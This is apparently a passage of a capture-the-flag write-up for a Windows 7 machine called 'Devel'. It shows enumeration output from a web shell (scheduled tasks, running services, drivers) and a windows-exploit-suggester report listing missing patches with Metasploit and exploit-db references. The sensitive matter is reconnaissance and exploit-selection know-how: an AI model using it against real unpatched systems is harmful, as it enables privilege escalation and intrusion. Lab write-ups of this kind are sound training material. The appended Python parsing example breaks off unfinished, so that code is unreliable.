Task To Run: %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
Start In: N/A
Comment: This event is triggered when an IP address conflict is detected.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Tcpip\IpAddressConflict2
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
Start In: N/A
Comment: This event is triggered when an IP address conflict is detected.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\TextServicesFramework
HostName: DEVEL
TaskName: \Microsoft\Windows\TextServicesFramework\MsCtfMonitor
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 28/12/2017 2:44:24
Last Result: 0
Author: N/A
Task To Run: COM handler
Start In: N/A
Comment: TextServicesFramework monitor task
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Time Synchronization
HostName: DEVEL
TaskName: \Microsoft\Windows\Time Synchronization\SynchronizeTime
Next Run Time: 15/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 5:57:06
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\sc.exe start w32time task_started
Start In: N/A
Comment: Maintains date and time synchronization on all clients and servers in the network. If this service is stopped, date and time synchronization will be unavailable. If this service is disabled, any services that explicitly depend on it will fail to start.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2005
End Date: N/A
Days: SUN
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Windows Error Reporting
HostName: DEVEL
TaskName: \Microsoft\Windows\Windows Error Reporting\QueueReporting
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 18/3/2017 1:08:40
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\wermgr.exe -queuereporting
Start In: N/A
Comment: Windows Error Reporting task to process queued reports.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Windows Filtering Platform
HostName: DEVEL
TaskName: \Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Start In: N/A
Comment: This task adjusts the start type for firewall-triggered services when the start type of the Base Filtering Engine (BFE) is disabled.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Windows Media Sharing
HostName: DEVEL
TaskName: \Microsoft\Windows\Windows Media Sharing\UpdateLibrary
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
Start In: N/A
Comment: This task updates the cached list of folders and the security permissions on any new files in a user?s shared media library.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\WindowsBackup
HostName: DEVEL
TaskName: \Microsoft\Windows\WindowsBackup\ConfigNotification
Next Run Time: 14/9/2019 10:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 1:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
Start In: N/A
Comment: This scheduled task notifies the user that Windows Backup has not been configured.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 10:00:00
Start Date: 24/3/2017
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\WindowsColorSystem
HostName: DEVEL
TaskName: \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: 14/7/2009 7:54:01
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task applies color calibration settings.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: 14/7/2009 7:54:01
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: This task applies color calibration settings.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows Defender
HostName: DEVEL
TaskName: \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time: 14/9/2019 3:11:42
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
Start In: N/A
Comment: Scheduled Scan
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 3:11:42
Start Date: 1/1/2000
End Date: 1/1/2100
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
c:\windows\system32\inetsrv>tasklist /SVC
tasklist /SVC
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 264 N/A
csrss.exe 344 N/A
wininit.exe 384 N/A
csrss.exe 396 N/A
winlogon.exe 452 N/A
services.exe 488 N/A
lsass.exe 496 SamSs
lsm.exe 504 N/A
svchost.exe 608 DcomLaunch, PlugPlay, Power
svchost.exe 672 RpcEptMapper, RpcSs
svchost.exe 724 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
LogonUI.exe 792 N/A
svchost.exe 832 AudioEndpointBuilder, CscService, SysMain,
TrkWks, UxSms
svchost.exe 888 AeLookupSvc, gpsvc, iphlpsvc, LanmanServer,
ProfSvc, Schedule, SENS, Themes, Winmgmt,
wuauserv
svchost.exe 1000 EventSystem, netprofm, nsi, sppuinotify,
W32Time, WdiServiceHost, WinHttpAutoProxySv
svchost.exe 1072 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc
spoolsv.exe 1184 Spooler
svchost.exe 1220 BFE, DPS, MpsSvc
svchost.exe 1320 AppHostSvc
svchost.exe 1392 FDResPub
svchost.exe 1424 ftpsvc
VGAuthService.exe 1512 VGAuthService
vmtoolsd.exe 1540 VMTools
svchost.exe 1572 W3SVC, WAS
WmiPrvSE.exe 2020 N/A
msdtc.exe 1632 MSDTC
sppsvc.exe 2696 sppsvc
svchost.exe 2736 WinDefend
SearchIndexer.exe 2816 WSearch
TrustedInstaller.exe 3948 TrustedInstaller
w3wp.exe 2584 N/A
cmd.exe 3928 N/A
conhost.exe 1240 N/A
tasklist.exe 1052 N/A
c:\windows\system32\inetsrv>net start
net start
These Windows services are started:
Application Experience
Application Host Helper Service
Base Filtering Engine
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Function Discovery Resource Publication
Group Policy Client
IP Helper
Microsoft FTP Service
Network List Service
Network Location Awareness
Network Store Interface Service
Offline Files
Plug and Play
Power
Print Spooler
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Security Accounts Manager
Security Center
Server
Software Protection
SPP Notification Service
Superfetch
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
Themes
User Profile Service
VMware Alias Manager and Ticket Service
VMware Tools
Windows Audio
Windows Audio Endpoint Builder
Windows Defender
Windows Event Log
Windows Firewall
Windows Management Instrumentation
Windows Modules Installer
Windows Process Activation Service
Windows Search
Windows Time
Windows Update
WinHTTP Web Proxy Auto-Discovery Service
Workstation
World Wide Web Publishing Service
The command completed successfully.
c:\windows\system32\inetsrv> DRIVERQUERY
DRIVERQUERY
Module Name Display Name Driver Type Link Date
============ ====================== ============= ======================
1394ohci 1394 OHCI Compliant Ho Kernel 14/7/2009 2:51:59
ACPI Microsoft ACPI Driver Kernel 14/7/2009 2:11:11
AcpiPmi ACPI Power Meter Drive Kernel 14/7/2009 2:16:36
adp94xx adp94xx Kernel 6/12/2008 1:59:55
adpahci adpahci Kernel 1/5/2007 8:29:26
adpu320 adpu320 Kernel 28/2/2007 2:03:08
AFD Ancillary Function Dri Kernel 14/7/2009 2:12:34
agp440 Intel AGP Bus Filter Kernel 14/7/2009 2:25:36
aic78xx aic78xx Kernel 12/4/2006 3:20:11
aliide aliide Kernel 14/7/2009 2:11:17
amdagp AMD AGP Bus Filter Dri Kernel 14/7/2009 2:25:36
amdide amdide Kernel 14/7/2009 2:11:19
AmdK8 AMD K8 Processor Drive Kernel 14/7/2009 2:11:03
AmdPPM AMD Processor Driver Kernel 14/7/2009 2:11:03
amdsata amdsata Kernel 19/5/2009 8:54:22
amdsbs amdsbs Kernel 20/3/2009 8:35:26
amdxata amdxata Kernel 19/5/2009 8:57:35
AppID AppID Driver Kernel 14/7/2009 2:36:51
arc arc Kernel 25/5/2007 12:31:06
arcsas arcsas Kernel 14/1/2009 9:26:37
AsyncMac RAS Asynchronous Media Kernel 14/7/2009 2:54:46
atapi IDE Channel Kernel 14/7/2009 2:11:15
b06bdrv Broadcom NetXtreme II Kernel 14/2/2009 12:10:59
b57nd60x Broadcom NetXtreme Gig Kernel 26/4/2009 2:15:34
Beep Beep Kernel 14/7/2009 2:45:00
blbdrive blbdrive Kernel 14/7/2009 2:23:04
bowser Browser Support Driver File System 14/7/2009 2:14:21
BrFiltLo Brother USB Mass-Stora Kernel 7/8/2006 12:33:45
BrFiltUp Brother USB Mass-Stora Kernel 7/8/2006 12:33:45
Brserid Brother MFC Serial Por Kernel 7/8/2006 12:33:50
BrSerWdm Brother WDM Serial dri Kernel 7/8/2006 12:33:44
BrUsbMdm Brother MFC USB Fax On Kernel 7/8/2006 12:33:43
BrUsbSer Brother MFC USB Serial Kernel 9/8/2006 3:02:02
BTHMODEM Bluetooth Serial Commu Kernel 14/7/2009 2:51:34
cdfs CD/DVD File System Rea File System 14/7/2009 2:11:14
cdrom CD-ROM Driver Kernel 14/7/2009 2:11:24
circlass Consumer IR Devices Kernel 14/7/2009 2:51:17
CLFS Common Log (CLFS) Kernel 14/7/2009 2:11:10
CmBatt Microsoft AC Adapter D Kernel 14/7/2009 2:19:18
cmdide cmdide Kernel 14/7/2009 2:11:18
CNG CNG Kernel 14/7/2009 2:32:55
Compbatt Microsoft Composite Ba Kernel 14/7/2009 2:19:18
CompositeBus Composite Bus Enumerat Kernel 14/7/2009 2:45:26
crcdisk Crcdisk Filter Driver Kernel 14/7/2009 2:46:05
CSC Offline Files Driver Kernel 14/7/2009 2:15:08
DfsC DFS Namespace Client D File System 14/7/2009 2:14:16
discache System Attribute Cache Kernel 14/7/2009 2:24:04
Disk Disk Driver Kernel 14/7/2009 2:11:28
DXGKrnl LDDM Graphics Subsyste Kernel 14/7/2009 2:26:15
E1G60 Intel(R) PRO/1000 NDIS Kernel 29/5/2008 2:14:11
ebdrv Broadcom NetXtreme II Kernel 31/12/2008 6:06:23
elxstor elxstor Kernel 4/2/2009 12:09:33
ErrDev Microsoft Hardware Err Kernel 14/7/2009 2:19:18
exfat exFAT File System Driv File System 14/7/2009 2:14:01
fastfat FAT12/16/32 File Syste File System 14/7/2009 2:14:01
fdc Floppy Disk Controller Kernel 14/7/2009 2:45:45
FileInfo File Information FS Mi File System 14/7/2009 2:21:51
Filetrace Filetrace File System 14/7/2009 2:15:29
flpydisk Floppy Disk Driver Kernel 14/7/2009 2:45:45
FltMgr FltMgr File System 14/7/2009 2:11:13
FsDepends File System Dependency File System 14/7/2009 2:15:38
fvevol Bitlocker Drive Encryp Kernel 14/7/2009 2:13:01
gagp30kx Microsoft Generic AGPv Kernel 14/7/2009 2:25:42
hcw85cir Hauppauge Consumer Inf Kernel 11/5/2009 10:22:41
HDAudBus Microsoft UAA Bus Driv Kernel 14/7/2009 2:50:55
HidBatt HID UPS Battery Driver Kernel 14/7/2009 2:19:21
HidBth Microsoft Bluetooth HI Kernel 14/7/2009 2:51:33
HidIr Microsoft Infrared HID Kernel 14/7/2009 2:51:04
HidUsb Microsoft HID Class Dr Kernel 14/7/2009 2:51:04
HpSAMD HpSAMD Kernel 19/5/2009 2:42:46
HTTP HTTP Kernel 14/7/2009 2:12:53
hwpolicy Hardware Policy Driver Kernel 14/7/2009 2:11:01
i8042prt i8042 Keyboard and PS/ Kernel 14/7/2009 2:11:23
iaStorV iaStorV Kernel 8/4/2009 7:54:58
iirsp iirsp Kernel 13/12/2005 11:48:01
intelide intelide Kernel 14/7/2009 2:11:19
intelppm Intel Processor Driver Kernel 14/7/2009 2:11:03
IpFilterDriv IP Traffic Filter Driv Kernel 14/7/2009 2:54:28
IPMIDRV IPMIDRV Kernel 14/7/2009 2:30:59
IPNAT IP Network Address Tra Kernel 14/7/2009 2:54:28
IRENUM IR Bus Enumerator Kernel 14/7/2009 2:53:27
isapnp isapnp Kernel 14/7/2009 2:19:29
iScsiPrt iScsiPort Driver Kernel 14/7/2009 2:46:21
kbdclass Keyboard Class Driver Kernel 14/7/2009 2:11:15
kbdhid Keyboard HID Driver Kernel 14/7/2009 2:45:09
KSecDD KSecDD Kernel 14/7/2009 2:11:56
KSecPkg KSecPkg Kernel 14/7/2009 2:34:00
lltdio Link-Layer Topology Di Kernel 14/7/2009 2:53:18
LSI_FC LSI_FC Kernel 10/12/2008 12:28:47
LSI_SAS LSI_SAS Kernel 19/5/2009 3:19:55
LSI_SAS2 LSI_SAS2 Kernel 19/5/2009 3:31:29
LSI_SCSI LSI_SCSI Kernel 17/4/2009 1:14:47
luafv UAC File Virtualizatio File System 14/7/2009 2:15:44
megasas megasas Kernel 19/5/2009 4:09:36
MegaSR MegaSR Kernel 19/5/2009 4:25:17
Modem Modem Kernel 14/7/2009 2:55:24
monitor Microsoft Monitor Clas Kernel 14/7/2009 2:25:58
mouclass Mouse Class Driver Kernel 14/7/2009 2:11:15
mouhid Mouse HID Driver Kernel 14/7/2009 2:45:08
mountmgr Mount Point Manager Kernel 14/7/2009 2:11:27
mpio mpio Kernel 14/7/2009 2:46:13
mpsdrv Windows Firewall Autho Kernel 14/7/2009 2:52:52
MRxDAV WebDav Client Redirect File System 14/7/2009 2:14:25
mrxsmb SMB MiniRedirector Wra File System 14/7/2009 2:14:24
mrxsmb10 SMB 1.x MiniRedirector File System 14/7/2009 2:14:34
mrxsmb20 SMB 2.0 MiniRedirector File System 14/7/2009 2:14:29
msahci msahci Kernel 14/7/2009 2:45:50
msdsm msdsm Kernel 14/7/2009 2:46:19
Msfs Msfs File System 14/7/2009 2:11:26
mshidkmdf Pass-through HID to KM Kernel 14/7/2009 2:51:07
msisadrv msisadrv Kernel 14/7/2009 2:11:09
MsRPC MsRPC Kernel 14/7/2009 2:11:59
mssmbios Microsoft System Manag Kernel 14/7/2009 2:19:25
MTConfig Microsoft Input Config Kernel 14/7/2009 2:46:55
Mup Mup File System 14/7/2009 2:14:14
NativeWifiP NativeWiFi Filter Kernel 14/7/2009 2:51:59
NDIS NDIS System Driver Kernel 14/7/2009 2:12:24
NdisCap NDIS Capture LightWeig Kernel 14/7/2009 2:52:44
NdisTapi Remote Access NDIS TAP Kernel 14/7/2009 2:54:24
Ndisuio NDIS Usermode I/O Prot Kernel 14/7/2009 2:53:51
NdisWan Remote Access NDIS WAN Kernel 14/7/2009 2:54:34
NDProxy NDIS Proxy Kernel 14/7/2009 2:54:27
NetBIOS NetBIOS Interface File System 14/7/2009 2:53:54
NetBT NetBT Kernel 14/7/2009 2:12:18
nfrd960 nfrd960 Kernel 7/6/2006 12:12:15
Npfs Npfs File System 14/7/2009 2:11:31
nsiproxy NSI proxy service driv Kernel 14/7/2009 2:12:08
Ntfs Ntfs File System 14/7/2009 2:12:05
Null Null Kernel 14/7/2009 2:11:12
nvraid nvraid Kernel 20/5/2009 9:43:36
nvstor nvstor Kernel 20/5/2009 9:44:09
nv_agp NVIDIA nForce AGP Bus Kernel 14/7/2009 2:25:50
ohci1394 1394 OHCI Compliant Ho Kernel 14/7/2009 2:51:29
Parport Parallel port driver Kernel 14/7/2009 2:45:34
partmgr Partition Manager Kernel 14/7/2009 2:11:35
Parvdm Parvdm Kernel 14/7/2009 2:45:29
pci PCI Bus Driver Kernel 14/7/2009 2:11:16
pciide pciide Kernel 14/7/2009 2:11:19
pcmcia pcmcia Kernel 14/7/2009 2:19:29
pcw Performance Counters f Kernel 14/7/2009 2:11:10
PEAUTH PEAUTH Kernel 14/7/2009 3:35:44
PptpMiniport WAN Miniport (PPTP) Kernel 14/7/2009 2:54:47
Processor Processor Driver Kernel 14/7/2009 2:11:03
Psched QoS Packet Scheduler Kernel 14/7/2009 2:53:58
pvscsi pvscsi Storage Control Kernel 26/1/2016 1:15:17
ql2300 ql2300 Kernel 23/1/2009 1:28:52
ql40xx ql40xx Kernel 19/5/2009 4:17:31
RasAcd Remote Access Auto Con Kernel 14/7/2009 2:54:40
RasAgileVpn WAN Miniport (IKEv2) Kernel 14/7/2009 2:55:00
Rasl2tp WAN Miniport (L2TP) Kernel 14/7/2009 2:54:33
RasPppoe Remote Access PPPOE Dr Kernel 14/7/2009 2:54:53
RasSstp WAN Miniport (SSTP) Kernel 14/7/2009 2:54:57
rdbss Redirected Buffering S File System 14/7/2009 2:14:26
rdpbus Remote Desktop Device Kernel 14/7/2009 3:02:40
RDPCDD RDPCDD Kernel 14/7/2009 3:01:40
RDPDR Terminal Server Device Kernel 14/7/2009 3:02:56
RDPENCDD RDP Encoder Mirror Dri Kernel 14/7/2009 3:01:39
RDPREFMP Reflector Display Driv Kernel 14/7/2009 3:01:41
RDPWD RDP Winstation Driver Kernel 14/7/2009 3:01:50
rdyboost ReadyBoost Kernel 14/7/2009 2:22:02
rspndr Link-Layer Topology Di Kernel 14/7/2009 2:53:20
s3cap s3cap Kernel 14/7/2009 2:28:46
sbp2port sbp2port Kernel 14/7/2009 2:11:28
scfilter Smart card PnP Class F Kernel 14/7/2009 2:33:50
Serenum Serenum Filter Driver Kernel 14/7/2009 2:45:27
Serial Serial Port Driver Kernel 14/7/2009 2:45:33
sermouse Serial Mouse Driver Kernel 14/7/2009 2:45:08
sffdisk SFF Storage Class Driv Kernel 14/7/2009 2:45:52
sffp_mmc SFF Storage Protocol D Kernel 14/7/2009 2:45:52
sffp_sd SFF Storage Protocol D Kernel 14/7/2009 2:45:51
sfloppy High-Capacity Floppy D Kernel 14/7/2009 2:45:52
sisagp SIS AGP Bus Filter Kernel 14/7/2009 2:25:35
SiSRaid2 SiSRaid2 Kernel 24/9/2008 9:19:45
SiSRaid4 SiSRaid4 Kernel 2/10/2008 12:52:22
Smb Message-oriented TCP/I Kernel 14/7/2009 2:53:39
spldr Security Processor Loa Kernel 11/5/2009 7:13:47
srv Server SMB 1.xxx Drive File System 14/7/2009 2:15:10
srv2 Server SMB 2.xxx Drive File System 14/7/2009 2:14:52
srvnet srvnet File System 14/7/2009 2:14:45
stexstor stexstor Kernel 18/2/2009 1:03:21
storflt Disk Virtual Machine B Kernel 14/7/2009 2:28:44
storvsc storvsc Kernel 14/7/2009 2:28:44
swenum Software Bus Driver Kernel 14/7/2009 2:45:08
Tcpip TCP/IP Protocol Driver Kernel 14/7/2009 2:13:18
TCPIP6 Microsoft IPv6 Protoco Kernel 14/7/2009 2:13:18
tcpipreg TCP/IP Registry Compat Kernel 14/7/2009 2:54:14
TDPIPE TDPIPE Kernel 14/7/2009 3:01:36
TDTCP TDTCP Kernel 14/7/2009 3:01:37
tdx NetIO Legacy TDI Suppo Kernel 14/7/2009 2:12:10
TermDD Terminal Device Driver Kernel 14/7/2009 3:01:35
tssecsrv Remote Desktop Service Kernel 14/7/2009 3:01:50
tunnel Microsoft Tunnel Minip Kernel 14/7/2009 2:54:03
uagp35 Microsoft AGPv3.5 Filt Kernel 14/7/2009 2:25:40
udfs udfs File System 14/7/2009 2:14:09
uliagpkx Uli AGP Bus Filter Kernel 14/7/2009 2:25:47
umbus UMBus Enumerator Drive Kernel 14/7/2009 2:51:38
UmPass Microsoft UMPass Drive Kernel 14/7/2009 2:51:35
usbccgp Microsoft USB Generic Kernel 14/7/2009 2:51:31
usbcir eHome Infrared Receive Kernel 14/7/2009 2:51:18
usbehci Microsoft USB 2.0 Enha Kernel 14/7/2009 2:51:14
usbhub Microsoft USB Standard Kernel 14/7/2009 2:52:06
usbohci Microsoft USB Open Hos Kernel 14/7/2009 2:51:14
usbprint Microsoft USB PRINTER Kernel 14/7/2009 3:17:06
USBSTOR USB Mass Storage Drive Kernel 14/7/2009 2:51:19
usbuhci Microsoft USB Universa Kernel 14/7/2009 2:51:10
vdrvroot Microsoft Virtual Driv Kernel 14/7/2009 2:46:19
vga vga Kernel 14/7/2009 2:25:49
VgaSave VgaSave Kernel 14/7/2009 2:25:50
vhdmp vhdmp Kernel 14/7/2009 2:46:25
viaagp VIA AGP Bus Filter Kernel 14/7/2009 2:25:39
ViaC7 VIA C7 Processor Drive Kernel 14/7/2009 2:11:03
viaide viaide Kernel 14/7/2009 2:11:20
vm3dmp vm3dmp Kernel 14/12/2016 12:32:48
vmbus Virtual Machine Bus Kernel 14/7/2009 2:28:53
VMBusHID VMBusHID Kernel 14/7/2009 2:28:45
vmci VMware VMCI Bus Driver Kernel 4/6/2016 11:06:29
VMMemCtl Memory Control Driver Kernel 5/3/2016 1:15:45
vmmouse VMware Pointing Device Kernel 20/2/2016 1:14:08
volmgr Volume Manager Driver Kernel 14/7/2009 2:11:25
volmgrx Dynamic Volume Manager Kernel 14/7/2009 2:11:41
volsnap Storage volumes Kernel 14/7/2009 2:11:34
vsmraid vsmraid Kernel 31/1/2009 3:13:29
vsock vSockets Virtual Machi Kernel 22/6/2016 11:07:52
vwifibus Virtual WiFi Bus Drive Kernel 14/7/2009 2:52:02
WacomPen Wacom Serial Pen HID D Kernel 14/7/2009 2:46:53
WANARP Remote Access IP ARP D Kernel 14/7/2009 2:55:02
Wanarpv6 Remote Access IPv6 ARP Kernel 14/7/2009 2:55:02
Wd Wd Kernel 14/7/2009 2:11:31
Wdf01000 Kernel Mode Driver Fra Kernel 14/7/2009 2:11:36
WfpLwf WFP Lightweight Filter Kernel 14/7/2009 2:53:51
WIMMount WIMMount File System 14/7/2009 2:17:57
WmiAcpi Microsoft Windows Mana Kernel 14/7/2009 2:19:16
ws2ifsl Windows Socket 2.0 Non Kernel 14/7/2009 2:55:01
WudfPf User Mode Driver Frame Kernel 14/7/2009 2:50:13
c:\windows\system32\inetsrv>
Exploit Suggester
Devel Machine
C:> systeminfo > systeminfo.txt
Kalibox
# ./windows-exploit-suggester.py --database 2019-09-10-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
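Read from the defender's side, this report is a patch backlog for the host. The added example below (not part of the original write-up or of windows-exploit-suggester) parses the result lines shown above into bulletin, KB number and public-exploit source, and reads the hotfix count from the header; the function names and the impact grouping are assumptions made for illustration.

```python
import re

# Constructed sample: lines copied from the suggester RESULT shown on this page.
SAMPLE = """\
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
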